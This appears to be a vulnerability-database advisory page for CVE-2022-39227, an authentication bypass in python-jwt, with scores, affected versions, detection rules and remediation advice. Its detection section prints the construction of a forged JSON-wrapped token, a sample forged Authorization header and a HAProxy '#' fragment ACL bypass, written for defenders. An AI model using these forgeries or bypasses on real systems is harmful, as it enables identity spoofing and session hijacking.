cbcvebase.
CVE-2022-39227
published 2022-09-23

CVE-2022-39227: python-jwt is a module for generating and verifying JSON Web Tokens. Versions prior to 3.3.4 are subject to Authentication Bypass by Spoofing, resulting in…

PriorityP265critical9.1CVSS 3.1
AVNACLPRNUINSUCHIHAN
EPSS
3.56%
87.9th percentile
python-jwt is a module for generating and verifying JSON Web Tokens. Versions prior to 3.3.4 are subject to Authentication Bypass by Spoofing, resulting in identity spoofing, session hijacking or authentication bypass. An attacker who obtains a JWT can arbitrarily forge its contents without knowing the secret key. Depending on the application, this may for example enable the attacker to spoof other user's identities, hijack their sessions, or bypass authentication. Users should upgrade to version 3.3.4. There are no known workarounds.

Affected

8 ranges
VendorProductVersion rangeFixed in
davedoesdevpython-jwt< 3.3.43.3.4
msrcazl3_python-jwt_2.8.0-2_on_azure_linux_3.0
msrccbl2_python-jwt_2.4.0-2_on_cbl_mariner_2.0
msrccm1_python-jwt_2.4.0-2_on_cbl_mariner_1.0
python-jwt_projectpython-jwt>= 0 < 3.3.43.3.4
python-jwt_projectpython-jwt>= 3.0.0 < 3.3.43.3.4
python-jwt_projectpython-jwt>= 3.0.0 < 3.3.43.3.4
python-jwt_projectpython-jwt>= f6d1451012c6a04c2fb1940f0bbd93bb6cf2b025 < 88ad9e67c53aa5f7c43ec4aa52ed34b7930068c988ad9e67c53aa5f7c43ec4aa52ed34b7930068c9

Detection & IOCsextracted from sources · hover to see the quote

command'{" ' + header + '.'+ fake_payload + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"}'
otherAuthorization: {" eyJhbGciOiJQUzI1NiIsInR5cCI6IkpXVCJ9.<tampered_payload>.":"","protected":"eyJhbGciOiJQUzI1NiIsInR5cCI6IkpXVCJ9", "payload":"<original_payload>","signature":"<original_signature>"}
  • Detect CVE-2022-39227 exploit attempts by inspecting the Authorization header for a JWT-like value that begins with '{"' (a JSON object wrapping), which is the hallmark of the forged token structure used in this attack.
  • Detect HAProxy ACL bypass (CVE-2023-45539, chained with CVE-2022-39227) by monitoring HTTP requests to protected endpoints that include a '#' fragment character in the URI path, e.g. GET /api/v1/get_ticket#.
  • Detect JWT claim tampering by alerting on tokens where the payload contains a 'role' claim set to 'administrator' but the token structure is a JSON object containing 'protected', 'payload', and 'signature' keys rather than a standard dot-separated JWT string.
  • The forged token preserves the original header and signature while substituting a tampered base64url-encoded payload; detection should flag Authorization header values matching the pattern: JSON object with keys 'protected', 'payload', 'signature' alongside a dot-separated JWT prefix.
  • Flag python-jwt versions prior to 3.3.4 in software inventory as vulnerable; the library allows an attacker who obtains any valid JWT to forge arbitrary contents without the secret key.
  • ·The HAProxy ACL blocking /api/v1/get_ticket is bypassable via the '#' fragment; the ACL rule must also match URI variants with fragment characters to be effective.
  • ·python-jwt 3.3.3 (and all versions prior to 3.3.4) is the vulnerable version; upgrading to 3.3.4 is the only remediation — there are no known workarounds.

CVSS provenance

nvdv3.19.1CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
vendor_msrc9.1CRITICAL
vendor_redhat9.1CRITICAL
Stop checking back — get the weekly exploitation signal.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.